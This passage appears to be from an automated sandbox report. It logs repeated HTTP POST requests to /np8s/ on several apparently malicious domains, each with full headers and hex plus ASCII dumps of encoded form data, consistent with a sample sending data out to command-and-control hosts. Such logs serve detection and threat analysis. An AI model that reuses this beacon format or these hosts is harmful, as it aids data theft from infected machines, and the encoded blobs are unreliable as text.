50 37 69 66 79 51 67 73 52 43 48 45 4c 30 32 6b 4e 61 33 77 6a 30 7a 41 66 64 5f 64 56 65 2d 7a 6e 53 35 46 70 52 49 72 6b 42 6d 63 6d 6d 32 34 35 46 30 56 55 76 32 63 47 68 5f 38 37 57 36 43 74 63 4f 55 4d 63 56 42 65 6d 64 66 54 58 76 67 45 68 4f 55 54 76 4d 74 4f 79 4b 72 78 54 4f 4c 75 6e 32 39 74 48 72 6e 7a 6a 4a 63 59 39 32 4b 55 61 4b 6e 4e 62 75 48 4a 52 53 57 53 4c 49 43 66 37 75 65 77 6e 45 70 6e 32 6c 4d 54 32 30 4d 65 58 67 6b 62 6c 75 78 77 57 54 4d 39 78 31 30 56 28 67 62 43 53 49 43 74 43 6b 38 63 30 7a 30 57 76 64 28 4a 6b 66 75 69 55 55 6d 42 4f 7a 6b 55 50 55 4b 79 4d 35 68 78 6b 33 6a 64 75 49 72 58 54 4a 34 53 6b 58 50 71 28 38 54 45 76 59 71 72 48 7a 69 33 6b 51 32 4e 47 73 6c 55 39 4b 45 70 33 69 48 4e 28 5a 78 67 69 61 4b 42 55 6a 71 59 72 71 35 48 6c 4d 6f 64 74 52 33 51 47 58 4b 63 62 41 66 5f 74 57 38 32 62 7a 6e 58 48 4a 42 70 73 50 5a 6f 4b 6c 76 6b 6f 39 43 57 77 62 68 44 5a 76 65 75 31 63 6c 66 61 6e 75 6b 74 58 4a 35 55 39 51 55 45 71 28 56 30 4a 76 53 4a 79 39 39 6c 6c 76 78
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.rasheedabossmoves.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rasheedabossmoves.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 6d 74 32 56 4c 69 38 59 6c 35 4d 77 54 38 7e 67 7a 74 69 6b 31 39 6a 55 6f 64 30 6d 66 63 78 57 39 38 6c 30 37 48 4e 64 37 67 6f 45 42 6b 6b 6b 55 4a 44 55 4f 33 6b 31 4d 6f 53 6d 58 46 61 4d 57 76 49 4a 68 73 63 68 78 64 49 4f 44 62 6b 75 61 66 4f 35 69 46 31 4f 70 4a 59 49 6d 37 35 44 42 7a 69 46 4d 75 38 79 47 69 6d 54 48 37 32 6c 31 5a 43 76 32 5a 68 5a 42 6c 62 51 68 79 67 48 39 46 74 71 79 71 4c 6e 77 61 62 67 75 4c 75 50 36 4f 58 46 73 48 66 59 4f 6c 55 43 6b 66 67 7a 4d 2d 41 4c 73 30 30 4c 61 62 4d 31 32 49 37 68 37 73 65 45 7e 43 7e 57 6e 6a 37 5f 4e 78 65 31 64 76 42 63 51 34 76 48 69 2d 53 4e 6b 37 47 37 30 31 46 39 64 44 55 30 77 54 63 75 75 41 62 36 63 32 49 4a 54 4c 6d 56 79 55 28 37 66 74 67 72 63 75 46 31 77 59 47 6f 7e 6f 50 78 4a 42 72 37 42 73 45 47 6a 2d 73 78 31 32 65 73 37 77 73 6a 62 65 59 36 33 62 48 6c 66 75 79 59 4f 58 55 4a 39 41 38 77 46 7a 61 66 53 48 74 50 71 4b 74 41 6c 62 35 52 63 5a 6c 62 43 77 44 51 42 6c 47 73 69 78 7e 66 6a 7a 4b 48 72 4b 51 41 33 79 31 6b 4f 44 6d 46 41 6a 54 71 6f 50 32 6e 6e 52 4a 64 70 72 4e 79 57 68 69 45 33 55 69 62 58 70 41 57 6d 71 50 72 46 74 48 55 36 57 46 53 67 52 43 50 53 53 6d 59 34 34 66 75 44 2d 54 6e 33 77 46 74 51 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=mt2VLi8Yl5MwT8~gztik19jUod0mfcxW98l07HNd7goEBkkkUJDUO3k1MoSmXFaMWvIJhschxdIODbkuafO5iF1OpJYIm75DBziFMu8yGimTH72l1ZCv2ZhZBlbQhygH9FtqyqLnwabguLuP6OXFsHfYOlUCkfgzM-ALs00LabM12I7h7seE~C~Wnj7_Nxe1dvBcQ4vHi-SNk7G701F9dDU0wTcuuAb6c2IJTLmVyU(7ftgrcuF1wYGo~oPxJBr7BsEGj-sx12es7wsjbeY63bHlfuyYOXUJ9A8wFzafSHtPqKtAlb5RcZlbCwDQBlGsix~fjzKHrKQA3y1kODmFAjTqoP2nnRJdprNyWhiE3UibXpAWmqPrFtHU6WFSgRCPSSmY44fuD-Tn3wFtQQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.rasheedabossmoves.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rasheedabossmoves.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 6d 74 32 56 4c 6e 39 62 72 6f 67 54 4e 38 43 54 31 65 53 77 7e 75 72 42 75 74 78 33 47 34 68 4a 28 2d 4e 67 28 43 6f 6e 38 68 41 53 51 6b 70 45 43 34 4c 63 4f 79 41 63 45 37 32 71 54 6c 57 4e 57 76 41 33 68 76 77 68 77 63 77 65 44 36 30 49 62 39 57 2d 75 46 31 2d 6f 4a 59 4e 33 71 31 69 42 7a 75 6e 4d 75 46 31 48 52 79 54 48 5a 4f 6c 39 36 61 65 79 35 68 54 50 47 6a 63 6c 79 73 61 39 46 31 79 79 6f 50 6e 77 4b 66 67 6f 62 65 4d 79 74 50 47 32 6e 66 42 4e 56 56 45 72 5f 74 4b 4d 2d 4e 6d 73 31 49 4c 61 70 34 31 33 59 62 68 73 76 32 44 31 53 7e 4f 6a 6a 36 39 63 68 61 6f 64 76 64 59 51 38 32 36 69 4f 32 4e 6c 4c 47 34 77 6d 6c 50 61 55 68 79 32 57 49 5a 75 41 57 73 63 48 6b 72 54 4a 53 70 31 6e 33 75 44 62 4d 56 63 72 56 62 78 34 48 68 78 49 50 36 4a 42 72 69 42 73 45 73 6a 2d 63 78 31 33 57 73 37 52 51 6a 4c 66 59 37 70 4c 48 38 4b 65 7a 4c 41 33 59 31 39 45 6f 67 46 7a 79 31 56 32 35 50 71 71 39 41 69 71 35 4f 54 35 6c 5a 4e 51 43 47 4b 46 47 6a 69 78 7e 74 6a 79 4c 4b 72 35 6b 41 78 6a 31 6b 4a 6e 47 46 43 54 54 71 32 66 32 70 6f 78 30 47 70 72 31 32 57 6b 47 79 77 6c 32 62 58 36 49 57 6e 49 6e 72 47 64 48 55 79 32 45 6e 76 79 6e 56 66 54 71 71 34 4b 37 79 55 62 53 5a 6a 56 73 2d 4d 68 48 4e 73 2d 73 47 61 5a 34 50 53 39 6e 74 49 77 46 39 51 7a 62 57 49 4f 69 49 7a 67 46 35 4f 37 70 48 6d 39 79 64 58 59 52 46 4c 62 62 6c 5a 72 28 76 65 6d 55 66 57 45 6c 4b 50 33 7e 64 50 32 4a 32 4e 38 4f 34 4c 34 78 76 63 32 52 73 47 73 48 79 28 67 54 48 4d 43 67 4a 67 4d 62 47 44 51 73 43 7a 61 33 31 77 77 47 
37 68 57 6e 56 7e 37 65 73 44 78 33 65 28 70 38 51 4c 47 53 32 42 47 28 67 53 4c 30 4c 74 36 65 51 47 41 59 49 28 71 35 36 43 52 36 56 31 6a 30 67 4e 4d 5a 6b 32 4b 56 43 61 41 53 64 47 59 74 5f 6b 47 78 6a 58 39 4d 5f 31 70 7e 52 42 4c 55 6f 28 43 4f 41 76 49 37 58 33 58 56 39 63 65 79 4c 41 32 71 73 54 48 39 7a 73 5a 66 79 37 56 33 38 7a 4d 65 44 45 71 71 55 68 74 4b 30 49 76 76 66 4e 55 58 43 4e 72 67 45 78 5a 43 4e 48 33 73 7a 6c 71 4f 41 79 74 54 39 6a 66 57 72 38 6d 52 79 63 5a 64 65 76 4e 79 33 70 55 45 51 41 70 67 2d 59 6b 48 78 49 31 76 39 45 34 68 6a 44 50 47 67 63 36 49 6b 78 2d 68 6a 73 41 55 38 53 4b 37 70 32 44 76 67 73 57 47 49 76 56 51 33 52 6c 53 74 34 51 6a 68 6e 54 75 70 70 4b 6e 35 61 41 59 72 47 66 6f 69 4c 4b 65 70 4b 72 4d 51 66 62 49 4c 7a 78 4f 7a 6a 78 39 69 64 74 45 57 47 35 54 4d 36 53 56 37 6b 65 34 68 70 4e 36 43 72 6b 71 63 56 6b 34 38 50 45 45 46 30 33 6a 75 31 38 4e 68 7e 4c 69 54 5a 49 67 41 4f 46 33 4a 32 51 53 61 42 46 73 7a 57 35 72 6a 6f 4e 43 79 33 55 65 5f 63 6c 38 36
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 5a 67 43 72 46 35 79 32 45 73 4d 42 52 64 35 50 48 77 34 51 53 30 31 32 4d 78 36 45 42 48 64 32 74 45 33 38 37 67 51 35 7e 52 62 39 77 45 66 71 4d 37 35 4b 6d 57 7e 31 50 50 76 38 74 49 4a 47 57 49 36 43 68 35 41 49 72 70 43 79 42 52 5a 66 35 48 30 6f 57 77 43 41 32 34 38 66 59 6f 41 45 35 68 57 61 45 71 52 31 36 4f 62 5f 64 72 48 4c 41 39 4d 48 70 7a 57 41 6a 75 78 70 61 4d 38 6e 51 62 4d 32 72 6f 6b 4f 51 69 32 51 77 51 6a 47 79 65 64 62 55 79 45 42 53 6b 6a 76 7e 54 63 4c 30 63 78 30 6d 75 45 6a 28 6d 34 4c 73 73 71 4b 54 74 4d 4f 7e 76 72 48 44 32 4c 4d 41 5f 4e 76 43 4e 36 75 5a 33 37 54 69 35 71 34 39 64 4b 51 79 38 4a 61 28 52 35 78 36 73 41 37 72 79 49 71 50 37 35 48 4c 73 4d 6e 50 5a 76 72 48 66 72 32 57 51 74 64 47 59 7e 50 4a 6c 59 42 55 45 4a 62 70 4e 33 74 31 5f 50 30 30 45 42 69 36 4b 6e 56 77 7a 6a 73 35 49 6a 41 6d 44 34 43 71 79 62 71 79 31 53 35 4a 56 79 53 6b 46 70 77 78 70 53 65 79 68 5a 42 69 49 6d 30 28 5f 37 41 32 6c 4d 66 55 36 77 50 6c 4a 64 4e 32 74 69 59 50 30 4c 39 64 6a 6b 56 6f 41 7e 46 51 53 30 47 59 72 41 53 35 77 39 4f 55 58 75 47 63 37 79 45 46 47 28 4e 72 43 4b 62 79 38 4c 75 64 51 56 63 76 72 30 51 4e 50 52 72 62 58 32 66 69 4b 7e 71 69 57 73 65 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=ZgCrF5y2EsMBRd5PHw4QS012Mx6EBHd2tE387gQ5~Rb9wEfqM75KmW~1PPv8tIJGWI6Ch5AIrpCyBRZf5H0oWwCA248fYoAE5hWaEqR16Ob_drHLA9MHpzWAjuxpaM8nQbM2rokOQi2QwQjGyedbUyEBSkjv~TcL0cx0muEj(m4LssqKTtMO~vrHD2LMA_NvCN6uZ37Ti5q49dKQy8Ja(R5x6sA7ryIqP75HLsMnPZvrHfr2WQtdGY~PJlYBUEJbpN3t1_P00EBi6KnVwzjs5IjAmD4Cqybqy1S5JVySkFpwxpSeyhZBiIm0(_7A2lMfU6wPlJdN2tiYP0L9djkVoA~FQS0GYrAS5w9OUXuGc7yEFG(NrCKby8LudQVcvr0QNPRrbX2fiK~qiWse(A).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.o7oiwlp.xyzConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.o7oiwlp.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.o7oiwlp.xyz/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 5a 67 43 72 46 37 33 6a 61 50 59 59 53 4e 31 38 45 41 73 45 48 55 46 30 4e 42 7e 48 4f 6d 77 32 6e 56 47 4e 31 43 59 49 28 54 62 6e 6d 6b 44 48 62 73 31 43 6d 53 36 51 56 73 47 33 36 34 56 46 57 4d 57 38 68 35 30 49 6f 70 71 35 41 32 46 35 33 45 63 76 55 51 44 37 31 34 38 47 54 4e 67 6c 35 6e 4c 31 45 71 59 2d 36 2d 6e 5f 50 59 76 4c 52 75 30 4d 30 44 58 46 67 71 63 32 43 73 77 41 51 62 55 75 72 73 73 4f 51 53 36 51 7a 78 54 46 6c 50 64 63 5a 43 45 41 5a 45 6a 36 33 7a 41 66 30 63 46 4b 6d 72 6b 6a 28 30 63 4c 71 74 4b 4b 61 38 4d 4a 30 5f 72 65 48 32 4c 46 45 5f 52 36 43 4a 61 59 5a 79 57 73 69 4a 75 34 39 74 4b 52 33 76 35 73 6f 79 51 6e 38 73 63 63 72 79 55 51 50 70 4d 55 4c 74 51 48 49 72 33 51 62 72 54 63 57 54 42 33 41 34 7e 4c 43 46 59 67 55 45 4a 72 70 4e 33 48 31 5f 28 30 30 44 6c 69 34 73 37 56 67 68 62 76 6b 59 6a 5f 74 6a 35 52 6e 53 58 61 79 78 7e 70 4a 51 65 30 6b 32 46 77 6a 38 32 65 30 56 74 4f 76 6f 6d 36 78 66 37 6a 28 46 4d 51 55 36 77 58 6c 49 64 64 78 63 7e 59 56 41 66 39 64 42 4d 56 71 77 7e 46 65 79 31 41 57 4c 4d 43 35 77 6c 4b 55 53 72 39 63 4b 32 45 45 54 6a 4e 71 6e 7e 62 78 4d 4c 75 52 77 56 4f 70 36 41 62 62 64 31 55 57 6b 69 55 6e 66 58 76 68 6e 64 67 76 4f 32 75 7e 4b 4c 50 48 31 58 54 68 7a 35 30 71 50 50 6a 67 52 70 55 63 73 4f 49 39 46 30 54 31 41 79 4b 56 64 58 46 43 52 6d 4e 4c 49 53 46 71 57 6f 73 4b 5f 75 71 4c 2d 66 37 79 6b 39 50 73 61 51 75 68 4f 39 4e 55 4f 7e 44 42 47 6a 30 77 6f 57 72 77 77 5a 62 35 35 35 2d 41 71 71 4e 55 72 35 56 50 6b 70 48 6d 68 74 2d 58 6c 39 5f 53 5a 51 65 78 
34 73 33 79 75 77 43 36 6d 56 70 51 6a 35 4a 61 55 4b 67 39 56 4d 57 28 46 64 38 6c 2d 53 4e 4d 4a 7e 55 69 56 6d 37 32 52 7a 64 6b 71 52 69 6d 66 43 6e 76 39 73 44 54 43 49 6d 72 78 49 64 31 4b 51 69 6d 47 71 65 59 41 50 31 55 36 53 66 79 36 78 7a 67 76 46 52 56 73 32 57 46 62 74 67 57 77 4e 52 65 51 41 6e 69 72 34 70 73 47 6a 55 6c 6f 4f 48 43 63 65 63 53 5f 34 68 6d 57 33 48 4b 5a 72 62 6e 38 74 30 36 52 52 46 58 51 6d 35 62 43 46 4c 39 4b 47 42 6b 33 36 48 6f 79 6e 32 67 36 5a 7a 39 42 31 6e 7a 41 49 39 4d 51 73 69 42 78 4f 38 65 2d 6e 48 66 53 79 33 62 35 65 58 49 75 77 46 4d 62 5a 41 36 44 38 69 38 73 31 56 47 32 6f 41 55 71 77 41 69 7a 69 43 77 38 77 6f 7e 6c 6e 4c 57 46 37 56 35 69 6c 38 39 69 55 6c 4d 58 68 62 73 75 32 54 34 4e 56 61 68 57 64 64 34 4f 58 44 41 5a 37 6c 62 68 32 6c 51 37 47 6f 66 4b 33 47 6a 4d 30 6a 70 72 70 32 52 35 78 76 34 5f 53 57 53 58 37 5f 38 54 77 35 39 34 55 47 7a 69 61 50 59 6f 57 70 31 58 43 42 4d 42 6f 58 43 71 6e 52 7a 31 4e 64 75 7a 79 69 43 77 45 6c 71 54 55 46 46 58
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 42 43 6b 47 48 6c 45 74 28 69 41 49 73 62 79 4d 43 49 54 4c 48 75 7e 4f 39 6b 6b 73 45 30 56 74 4f 75 70 6b 66 30 4b 53 4e 56 55 4e 73 74 44 44 57 6f 44 62 48 6d 4e 42 7e 67 72 55 72 68 4f 4a 67 36 78 71 78 43 75 38 65 42 61 63 38 68 54 6f 54 65 61 79 54 37 36 31 44 70 78 70 44 74 4f 6e 71 7a 54 45 6f 4c 64 56 68 54 72 38 70 76 45 67 50 59 7e 4f 39 69 38 61 6a 30 68 37 28 39 6d 56 55 5a 5a 70 74 47 6b 49 77 45 44 5a 74 45 39 49 78 42 67 41 37 5f 33 38 6c 62 4d 75 41 4b 67 7a 67 42 4c 65 68 55 5a 4e 57 57 48 6f 4d 51 6a 6d 44 5f 5a 52 72 47 35 70 28 75 7e 36 4a 46 43 63 32 53 39 46 64 52 4a 76 76 39 62 33 72 45 69 56 4e 65 28 51 6c 38 75 64 41 5f 6d 74 72 38 72 4a 39 63 48 4c 4b 4a 38 6a 78 34 55 53 45 4c 70 6b 58 55 62 5f 73 57 72 32 6e 44 38 39 72 47 6c 30 6f 4d 4b 33 63 38 55 64 75 43 36 55 45 75 42 4d 45 34 54 7a 67 5a 69 4f 77 39 4d 7a 67 51 45 66 46 51 7a 34 62 4d 31 32 55 4b 6d 32 36 67 65 51 4a 56 44 47 78 65 59 6c 75 66 69 70 4e 61 32 33 31 73 57 39 4e 4a 54 77 6f 48 78 72 61 4f 79 6c 38 49 72 35 70 45 7a 6c 71 45 76 79 45 43 4e 6c 4e 41 39 77 68 49 6f 54 48 44 7e 72 4e 34 37 4a 39 4d 36 5f 37 45 38 6c 42 4a 48 6e 35 31 49 4e 41 42 6d 73 4a 45 55 4f 6a 64 4c 4e 63 43 6e 30 38 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=BCkGHlEt(iAIsbyMCITLHu~O9kksE0VtOupkf0KSNVUNstDDWoDbHmNB~grUrhOJg6xqxCu8eBac8hToTeayT761DpxpDtOnqzTEoLdVhTr8pvEgPY~O9i8aj0h7(9mVUZZptGkIwEDZtE9IxBgA7_38lbMuAKgzgBLehUZNWWHoMQjmD_ZRrG5p(u~6JFCc2S9FdRJvv9b3rEiVNe(Ql8udA_mtr8rJ9cHLKJ8jx4USELpkXUb_sWr2nD89rGl0oMK3c8UduC6UEuBME4TzgZiOw9MzgQEfFQz4bM12UKm26geQJVDGxeYlufipNa231sW9NJTwoHxraOyl8Ir5pEzlqEvyECNlNA9whIoTHD~rN47J9M6_7E8lBJHn51INABmsJEUOjdLNcCn08g).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.ratebill.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.ratebill.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ratebill.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 42 43 6b 47 48 6e 51 37 78 32 77 56 78 62 50 73 57 65 58 66 50 5f 75 4d 78 30 6f 6a 61 47 51 74 4b 61 74 61 41 68 32 6a 63 67 51 62 6f 64 65 54 53 75 58 54 48 6e 38 6c 77 7a 50 75 76 42 4b 4b 67 37 56 55 78 43 71 38 66 41 79 4d 38 47 66 4f 55 38 69 39 52 62 36 4a 45 70 77 76 56 63 53 4b 71 7a 57 52 6f 4c 45 4b 68 6a 48 38 6f 4e 38 67 4a 5a 7e 4a 69 53 38 44 67 30 52 6e 37 39 72 48 55 5a 42 68 74 43 6b 49 78 30 50 5a 33 6b 74 4a 6d 57 4d 44 6a 5f 32 58 7a 4c 4d 4e 4f 71 6c 41 67 42 48 77 68 52 35 4e 57 41 76 6f 44 67 44 6d 49 75 5a 53 7e 6d 35 73 73 2d 7e 6a 4e 46 50 45 32 53 52 5a 64 56 52 56 75 49 62 33 6c 55 69 59 63 5f 37 75 75 39 75 30 43 5f 53 61 72 39 58 6b 39 4e 71 59 4b 4c 35 47 6e 36 4d 70 59 2d 31 65 58 52 4c 42 76 32 71 5f 76 6a 38 71 72 47 6c 45 6f 4d 4b 5a 63 39 6b 64 75 44 79 55 46 49 46 4d 48 61 36 6c 76 5a 69 4c 71 4e 4d 72 7e 67 5a 75 46 51 71 6d 62 4d 39 49 55 37 69 32 37 45 53 51 65 33 72 48 77 75 59 6a 67 5f 69 67 66 61 32 34 31 73 57 4c 4e 49 53 74 76 30 31 72 49 76 79 6c 73 61 44 35 6c 55 7a 6c 6d 6b 76 77 4c 69 42 50 4e 41 31 38 68 49 5a 6d 48 77 53 72 49 36 44 4a 7a 4a 61 5f 34 30 38 6c 4f 70 48 35 32 30 52 42 47 77 75 5f 4c 6e 30 44 70 61 43 36 53 47 76 5f 67 75 48 56 41 34 78 5a 4d 6f 70 2d 31 65 47 35 79 72 55 52 33 54 56 69 4b 78 7e 4c 75 5f 35 4d 67 6d 58 36 43 58 69 31 38 4b 52 4e 73 48 6f 56 49 73 4b 46 4c 4a 68 42 68 73 31 4f 58 6f 7e 67 76 53 53 77 55 65 68 52 71 73 71 67 49 58 32 5a 4e 6b 77 6c 7a 69 43 6b 52 6c 49 77 39 61 45 43 55 61 7a 30 41 50 70 73 41 57 70 47 6d 55 64 39 74 53 44 33 
54 6e 74 38 6a 63 58 43 41 78 6e 48 47 63 4c 30 54 63 69 53 68 64 4d 6f 31 44 55 57 64 51 71 41 54 41 53 63 7e 74 7e 69 77 59 47 46 4a 76 32 79 68 41 6b 6e 41 76 58 5a 73 57 28 4b 53 71 57 4d 64 68 57 78 4f 59 6c 74 5a 30 55 41 71 48 45 6f 46 73 76 74 6c 6a 54 31 43 71 7a 2d 50 6b 53 4f 28 4c 47 74 65 34 41 6e 39 66 6d 4d 69 71 79 52 68 6c 6f 42 6e 36 56 74 76 6a 7e 47 7a 75 69 6e 78 54 58 78 61 4d 64 54 36 47 62 35 36 4b 63 57 49 49 62 74 28 37 5a 4f 79 71 71 68 57 67 5a 4c 6c 6b 75 77 44 32 66 78 70 37 31 51 68 61 74 41 6a 2d 4f 6c 4b 38 30 67 74 31 7e 54 77 70 42 61 47 69 61 53 50 74 36 41 63 41 35 32 36 2d 63 38 28 67 7a 43 41 76 6a 49 4c 69 78 51 61 33 43 6f 6a 6e 4b 64 5a 59 50 4d 46 45 6e 50 73 74 63 36 28 61 48 73 73 66 4b 68 45 30 53 79 59 4b 28 31 66 55 55 55 38 66 57 4c 6d 34 70 63 71 47 39 6f 36 5f 4a 39 75 2d 76 5a 45 6a 4e 33 37 61 4a 4a 69 75 46 74 38 5f 79 6d 73 6e 54 4b 78 67 66 2d 58 63 44 6d 56 39 4b 61 43 74 47 51 76 58 38 55 65 71 79 69 59 52 75 4a 4e 4f 32 43 4e 67 79 4e 6c 69 59 64 65
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.2264a.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.2264a.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.2264a.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 64 59 74 76 67 6a 62 54 4e 72 52 32 79 38 64 7a 58 30 67 55 4c 74 42 4c 52 53 6d 2d 6e 42 4b 6f 79 6f 7a 59 4a 6b 4b 56 42 77 49 43 34 62 7a 6b 7e 32 4c 4f 67 65 55 51 63 4e 32 52 63 66 4c 6b 4e 4c 58 30 28 69 47 32 48 66 54 34 4d 43 71 61 39 4d 4c 51 4b 57 30 47 32 41 66 46 58 63 4e 73 63 62 37 33 45 4c 57 41 44 6f 70 5a 43 68 7e 55 45 4d 6b 31 57 61 6d 6e 41 66 39 31 53 43 79 58 73 36 53 41 6d 79 31 58 64 36 79 36 62 5a 50 66 67 47 71 48 50 5f 61 67 51 33 76 53 76 34 49 5a 6b 39 35 36 6b 36 76 74 30 37 6f 31 5a 69 36 6e 7a 5f 5a 56 39 41 4d 50 67 79 76 69 34 67 62 4b 28 53 72 76 39 51 50 4c 38 4c 4b 31 55 39 31 5a 4a 49 39 6b 69 76 37 73 39 70 53 48 66 4d 49 54 58 6d 64 33 49 4d 76 49 33 47 50 73 44 52 63 4a 61 74 43 79 67 49 43 41 45 62 52 64 57 4e 4d 4c 6a 74 4c 4f 41 35 7e 45 7e 33 32 74 4d 6f 4b 43 48 4f 6e 76 52 53 65 78 35 59 30 71 70 6f 4d 49 7a 5a 30 57 44 61 66 6c 6a 52 35 67 59 64 28 59 51 67 61 67 48 64 42 51 46 61 52 78 59 6c 53 35 36 36 52 74 30 48 67 7a 6d 39 77 32 4d 78 52 56 41 4a 75 79 4d 38 4c 38 65 74 59 30 39 35 71 49 41 53 5a 43 33 4e 65 39 38 4f 78 58 62 56 46 66 73 4b 47 65 6c 56 32 30 47 49 55 6f 79 4a 6e 44 7a 34 65 47 58 45 39 77 69 63 73 41 6a 55 5a 4e 5a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
c2MH6DeP=dYtvgjbTNrR2y8dzX0gULtBLRSm-nBKoyozYJkKVBwIC4bzk~2LOgeUQcN2RcfLkNLX0(iG2HfT4MCqa9MLQKW0G2AfFXcNscb73ELWADopZCh~UEMk1WamnAf91SCyXs6SAmy1Xd6y6bZPfgGqHP_agQ3vSv4IZk956k6vt07o1Zi6nz_ZV9AMPgyvi4gbK(Srv9QPL8LK1U91ZJI9kiv7s9pSHfMITXmd3IMvI3GPsDRcJatCygICAEbRdWNMLjtLOA5~E~32tMoKCHOnvRSex5Y0qpoMIzZ0WDafljR5gYd(YQgagHdBQFaRxYlS566Rt0Hgzm9w2MxRVAJuyM8L8etY095qIASZC3Ne98OxXbVFfsKGelV20GIUoyJnDz4eGXE9wicsAjUZNZQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.2264a.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.2264a.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.2264a.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 32 4d 48 36 44 65 50 3d 64 59 74 76 67 68 28 46 41 37 38 77 38 4d 67 6a 55 48 51 41 41 38 52 4e 54 69 79 48 36 31 61 65 28 36 4c 55 52 46 36 6b 41 78 68 44 38 72 76 4e 36 78 6d 54 67 63 4e 30 49 6f 47 56 4c 50 33 6a 4e 4c 50 4b 28 69 79 32 56 75 71 6c 4d 67 43 30 39 70 66 54 47 57 30 4d 33 41 66 63 61 34 45 2d 63 62 33 4a 45 4c 50 62 41 59 56 5a 51 54 57 55 47 4c 51 36 4d 4b 6d 68 4e 5f 73 30 63 69 7e 77 73 38 36 59 6d 77 68 58 64 74 36 36 55 63 48 63 6d 48 71 47 55 5f 61 6c 41 6e 76 78 6d 59 45 6e 6b 39 74 4d 6b 37 44 74 30 4a 4d 31 5a 79 61 6e 69 6f 6c 61 7a 51 4d 4f 79 43 76 56 38 67 6e 58 28 54 44 7a 39 52 4c 78 38 5f 65 31 58 74 31 55 44 37 4d 45 6e 34 76 46 28 71 4f 67 66 4d 4e 48 58 53 46 76 49 4a 57 54 77 33 65 4a 50 56 6c 6b 61 6f 36 4d 69 6f 44 4a 4c 37 51 4a 57 4e 4e 36 6a 74 4c 67 41 34 75 45 7e 32 75 74 4e 4c 79 43 52 36 54 73 65 53 66 61 67 49 30 49 71 59 51 61 7a 5a 4e 52 44 65 54 44 69 6a 56 67 65 38 50 59 5a 78 61 6a 66 74 42 73 4b 36 51 76 52 46 53 69 36 36 51 41 30 47 67 5a 6d 4d 67 32 44 41 52 56 44 73 61 79 66 38 4c 38 43 39 5a 79 76 35 33 56 41 55 78 47 33 4e 75 4c 38 5a 68 58 43 6d 39 66 73 6f 75 65 70 46 32 30 41 49 55 5f 32 35 4f 4f 6c 37 57 6b 56 57 46 7a 6b 70 68 5f 70 57 63 6b 4a 4a 69 42 38 5f 62 76 70 75 50 53 70 4b 76 43 4d 56 6a 75 30 58 71 51 79 6c 73 65 4f 71 6c 35 51 37 35 62 37 37 42 31 6c 62 6d 56 32 45 56 6b 42 49 6a 5f 4a 47 56 77 41 51 35 6d 4e 49 44 65 6b 42 63 4e 64 67 43 79 5a 59 6c 4e 28 6b 6d 52 33 72 4e 4a 6c 6f 57 44 62 62 73 2d 31 76 35 6e 63 66 77 6d 4d 58 6d 52 56 51 61 57 50 71 58 4f 30 50 75 62 61 51 71 
